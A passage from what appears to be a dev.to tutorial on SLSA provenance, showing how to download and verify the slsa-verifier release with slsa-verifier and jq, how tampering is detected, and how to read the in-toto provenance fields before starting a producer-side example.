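# Toy in-toto Statement (the innermost layer).
statement='{"_type":"https://in-toto.io/Statement/v0.1","subject":[],"predicateType":"https://slsa.dev/provenance/v1","predicate":{}}'

# DSSE base64-wraps the payload on the inside; the signature (here a dummy) wraps the outside.
payload=$(printf '%s' "$statement" | base64 | tr -d '\n')
printf '{"payloadType":"application/vnd.in-toto+json","payload":"%s","signatures":[{"sig":"DUMMY"}]}\n' "$payload"
```

&lt;p&gt;Decoding &lt;code&gt;.payload&lt;/code&gt; gets you the Statement back, which is exactly what the &lt;code&gt;jq | base64 -d&lt;/code&gt; pipelines later in this post do.&lt;/p&gt;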

&lt;h3&gt;
  
  
  SLSA Build Level cheat sheet
&lt;/h3&gt;

&lt;p&gt;Just enough to keep us oriented. For the threat model, see &lt;a href="https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk"&gt;SLSA Deep Dive&lt;/a&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Level&lt;/th&gt;
&lt;th&gt;What it guarantees&lt;/th&gt;
&lt;th&gt;Threats it stops&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;L1&lt;/td&gt;
&lt;td&gt;Provenance exists&lt;/td&gt;
&lt;td&gt;Almost nothing (essentially documentation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;L2&lt;/td&gt;
&lt;td&gt;Provenance is signed&lt;/td&gt;
&lt;td&gt;Detects tampering during distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;L3&lt;/td&gt;
&lt;td&gt;Generated by a tamper-resistant build platform&lt;/td&gt;
&lt;td&gt;Stops everything short of builder compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;slsa-github-generator&lt;/code&gt;, the implementation we use here, is one of the few that actually clears L3. By leaning on GitHub's OIDC tokens and reusable workflows, it is structured so that user code cannot reach the builder's internal state.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why "reusable workflows" are the key to L3
&lt;/h3&gt;

&lt;p&gt;A GitHub Actions &lt;code&gt;uses: org/repo/.github/workflows/foo.yml@vX&lt;/code&gt; runs in a &lt;strong&gt;separate process, separate shell, separate filesystem&lt;/strong&gt; from the caller. So whatever the calling repo's owner puts in their YAML, they cannot touch the signing keys or OIDC tokens that the builder workflow handles.&lt;/p&gt;

&lt;p&gt;That structurally satisfies SLSA L3's requirement: &lt;strong&gt;"separate user-defined build steps (data plane) from the provenance generation logic (control plane)."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftjxy4yxf32qkvd0omzqe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftjxy4yxf32qkvd0omzqe.png" alt="Workflow" width="800" height="168"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The user just calls in via &lt;code&gt;uses:&lt;/code&gt;. They never touch the provenance assembly. That structural split is the heart of L3.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Verify a public artifact
&lt;/h2&gt;

&lt;p&gt;Theory only goes so far. Let's verify a real provenance on your machine first. Subject of choice: the &lt;code&gt;slsa-verifier&lt;/code&gt; release itself. Since &lt;code&gt;slsa-verifier&lt;/code&gt; is &lt;strong&gt;built with slsa-github-generator&lt;/strong&gt;, every release ships with &lt;code&gt;.intoto.jsonl&lt;/code&gt; alongside the binary.&lt;/p&gt;

&lt;h3&gt;
  
  
  Required tools
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# macOS&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;slsa-verifier jq

&lt;span class="c"&gt;# version check&lt;/span&gt;
slsa-verifier version
&lt;span class="c"&gt;# slsa-verifier: Verify SLSA provenance for Github Actions&lt;/span&gt;
&lt;span class="c"&gt;# GitVersion:    2.7.1&lt;/span&gt;
&lt;span class="c"&gt;# GitCommit:     Homebrew&lt;/span&gt;
&lt;span class="c"&gt;# GitTreeState:  clean&lt;/span&gt;
&lt;span class="c"&gt;# BuildDate:     2025-06-25T21:09:44Z&lt;/span&gt;
&lt;span class="c"&gt;# GoVersion:     go1.25.5&lt;/span&gt;
&lt;span class="c"&gt;# Compiler:      gc&lt;/span&gt;
&lt;span class="c"&gt;# Platform:      darwin/arm64&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 1: Download the artifact and its provenance
&lt;/h3&gt;

&lt;p&gt;A one-shot script that runs everything in this section lives at &lt;a href="https://github.com/0-draft/hello-slsa/blob/main/verify-real-artifact/run.sh" rel="noopener noreferrer"&gt;&lt;code&gt;hello-slsa/verify-real-artifact/run.sh&lt;/code&gt;&lt;/a&gt;. If you just want to see the flow, clone the repo and run &lt;code&gt;./run.sh&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;slsa-hands-on &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;slsa-hands-on

&lt;span class="c"&gt;# the artifact itself&lt;/span&gt;
curl &lt;span class="nt"&gt;-sLO&lt;/span&gt; https://github.com/slsa-framework/slsa-verifier/releases/download/v2.7.1/slsa-verifier-darwin-arm64

&lt;span class="c"&gt;# its provenance (in-toto Statement, wrapped in a DSSE envelope)&lt;/span&gt;
curl &lt;span class="nt"&gt;-sLO&lt;/span&gt; https://github.com/slsa-framework/slsa-verifier/releases/download/v2.7.1/slsa-verifier-darwin-arm64.intoto.jsonl

&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
&lt;span class="c"&gt;# -rw-r--r-- 1 user staff   32M slsa-verifier-darwin-arm64&lt;/span&gt;
&lt;span class="c"&gt;# -rw-r--r-- 1 user staff  17K slsa-verifier-darwin-arm64.intoto.jsonl&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Verification command
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Verified signature against tlog entry index 253498016 at URL: https://rekor.sigstore.dev/api/v1/log/entries/108e9186e8c5677a2ae86cf78d97874465b3150b3a30474f101c0ca4f916e78cd89ab8dcf6f2c927
Verified build using builder "https://github.com/slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@refs/tags/v2.0.0" at commit ea584f4502babc6f60d9bc799dbbb13c1caa9ee6
Verifying artifact slsa-verifier-darwin-arm64: PASSED

PASSED: SLSA verification passed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's unpack what just happened.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgjaldsyt8ax8d3ibbct.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgjaldsyt8ax8d3ibbct.png" alt="verification" width="800" height="682"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Two things to notice.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;No keys on your machine.&lt;/strong&gt; The verifier reaches Rekor (transparency log) and Fulcio (CA) to validate the certificate chain that was used at signing time. Same mechanism as Cosign keyless signing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;--source-uri&lt;/code&gt; and &lt;code&gt;--source-tag&lt;/code&gt; are inputs you provide.&lt;/strong&gt; "I want to trust this binary as coming from this repo at this tag" is a human-driven assertion, and it gets checked against what the provenance actually says.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;To see what happens when the assertion is wrong, point &lt;code&gt;--source-tag&lt;/code&gt; at a different tag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.0      &lt;span class="c"&gt;# ← wrong tag&lt;/span&gt;

&lt;span class="c"&gt;# FAILED: SLSA verification failed:&lt;/span&gt;
&lt;span class="c"&gt;#   expected tag 'v2.7.0', got 'v2.7.1':&lt;/span&gt;
&lt;span class="c"&gt;#   tag used to generate the binary does not match provenance&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Detect tampering
&lt;/h3&gt;

&lt;p&gt;Tamper with the artifact by appending a few bytes and try again.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"broken"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; slsa-verifier-darwin-arm64

slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.1

&lt;span class="c"&gt;# FAILED: SLSA verification failed:&lt;/span&gt;
&lt;span class="c"&gt;#   expected hash '424efd44128c51af49affd87bd3f0476eaab0a3e77ed1fee0ca7186c569b5388' not found:&lt;/span&gt;
&lt;span class="c"&gt;#   artifact hash does not match provenance subject&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The hash mismatch fails immediately. SUNSPOT-style attacks ("swap the binary after the build finishes") die right here.&lt;/p&gt;
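&lt;p&gt;You can reproduce the subject comparison by hand, without slsa-verifier. A sketch, assuming a fresh (untampered) copy of the two files from Step 1 in the current directory:&lt;/p&gt;

```shell
# Hash the artifact locally, then pull the expected digest out of the provenance.
art_hash=$(sha256sum slsa-verifier-darwin-arm64 | awk '{print $1}')
prov_hash=$(jq -r '.payload' slsa-verifier-darwin-arm64.intoto.jsonl \
  | base64 -d | jq -r '.subject[0].digest.sha256')

[ "$art_hash" = "$prov_hash" ] && echo "subject digest matches" || echo "MISMATCH"
```

&lt;p&gt;(On macOS, substitute &lt;code&gt;shasum -a 256&lt;/code&gt; for &lt;code&gt;sha256sum&lt;/code&gt;. And note this is only the &lt;code&gt;subject&lt;/code&gt; check; it does not replace the signature and certificate-chain verification that slsa-verifier performs.)&lt;/p&gt;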

&lt;h3&gt;
  
  
  Step 4: Look inside the provenance
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;.intoto.jsonl&lt;/code&gt; is a DSSE envelope; the payload is base64-encoded JSON. Pry it open with &lt;code&gt;jq&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'{_type, predicateType, subject, predicate: {builder: .predicate.builder, buildType: .predicate.buildType, configSource: .predicate.invocation.configSource}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trimmed output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"_type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://in-toto.io/Statement/v0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicateType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa.dev/provenance/v0.2"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"slsa-verifier-darwin-arm64"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"39abfcf5f1d690c3e889ce3d2d6a8b87711424d83368511868d414e8f8bcb05c"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicate"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"builder"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@refs/tags/v2.0.0"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"buildType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/go@v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"configSource"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/slsa-framework/slsa-verifier@refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"entryPoint"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;".github/workflows/release.yml"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What each field means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;subject&lt;/code&gt;&lt;/strong&gt;: "this provenance is making a statement about this binary." If the &lt;code&gt;name&lt;/code&gt; and SHA256 don't match the artifact, verification fails.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.builder.id&lt;/code&gt;&lt;/strong&gt;: who built it (which reusable workflow). The tag is included, so the builder version itself is pinned.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.buildType&lt;/code&gt;&lt;/strong&gt;: build kind (Go binary, container, etc.).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.invocation.configSource&lt;/code&gt;&lt;/strong&gt;: source repo plus the GitHub Actions workflow file that drove the build. &lt;code&gt;digest.sha1&lt;/code&gt; pins the commit, so even an attack that rewrites the contents of the v2.7.1 tag after the fact does not slip through.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;environment&lt;/code&gt; block has an even finer fingerprint of where the build ran.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'.predicate.invocation.environment | {github_event_name, github_ref, github_repository_owner, github_run_id, github_sha1, os}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_event_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"push"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_repository_owner"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"slsa-framework"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_run_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"15930257685"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"os"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ubuntu24"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;which GitHub event (&lt;code&gt;push&lt;/code&gt;) fired the workflow&lt;/li&gt;
&lt;li&gt;which repo, owned by whom&lt;/li&gt;
&lt;li&gt;which GitHub Actions run id (this number is permanent)&lt;/li&gt;
&lt;li&gt;which OS image it ran on&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With this much retained, "did a binary born from tag v2.7.1 actually come out of a GitHub-hosted runner running the legitimate workflow?" is fully reconstructable after the fact.&lt;/p&gt;
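&lt;p&gt;Because &lt;code&gt;github_run_id&lt;/code&gt; is permanent, it points straight back at the original build. A tiny sketch that rebuilds the run URL from the values above (the repo path is the one we passed as &lt;code&gt;--source-uri&lt;/code&gt;):&lt;/p&gt;

```shell
# Reconstruct the URL of the GitHub Actions run that produced the binary.
owner_repo="slsa-framework/slsa-verifier"
run_id="15930257685"   # github_run_id from the environment block above

echo "https://github.com/${owner_repo}/actions/runs/${run_id}"
```

&lt;p&gt;Open that URL and you can compare the run's logs against what the provenance claims.&lt;/p&gt;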

&lt;h3&gt;
  
  
  Step 5: Look at &lt;code&gt;materials&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;materials&lt;/code&gt; is "the list of build inputs": source code and the builder environment, side by side.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'.predicate.materials'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/slsa-framework/slsa-verifier@refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/actions/virtual-environments/releases/tag/ubuntu24/20250622.1.0"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Combine this with the SBOM and the chain "source → builder → artifact → internal components" becomes verifiable end to end.&lt;/p&gt;
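&lt;p&gt;One consistency check worth scripting: the source entry in &lt;code&gt;materials&lt;/code&gt; and &lt;code&gt;invocation.configSource&lt;/code&gt; should pin the same commit. A sketch against the provenance file downloaded earlier:&lt;/p&gt;

```shell
# The source material and the configSource must agree on the commit SHA.
prov=$(jq -r '.payload' slsa-verifier-darwin-arm64.intoto.jsonl | base64 -d)
src_sha=$(printf '%s' "$prov" | jq -r '.predicate.materials[0].digest.sha1')
cfg_sha=$(printf '%s' "$prov" | jq -r '.predicate.invocation.configSource.digest.sha1')

[ "$src_sha" = "$cfg_sha" ] && echo "source and configSource agree: $src_sha"
```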




&lt;h2&gt;
  
  
  2. Issue SLSA L3 Provenance from your own repo
&lt;/h2&gt;

&lt;p&gt;Verification works. Now flip to the producer side: build a Go hello-world and bolt &lt;code&gt;slsa-github-generator&lt;/code&gt; onto it.&lt;/p&gt;

&lt;p&gt;The finished version lives at &lt;a href="https://github.com/0-draft/hello-slsa" rel="noopener noreferrer"&gt;&lt;code&gt;github.com/0-draft/hello-slsa&lt;/code&gt;&lt;/a&gt;. Type along by hand or &lt;code&gt;git clone&lt;/code&gt;, whichever you prefer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Project layout
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;hello-slsa/
├── main.go
├── go.mod
├── .slsa-goreleaser.yml          # builder configuration
└── .github/
    └── workflows/
        └── release.yml            # release on tag push
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Minimal code
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;main.go&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
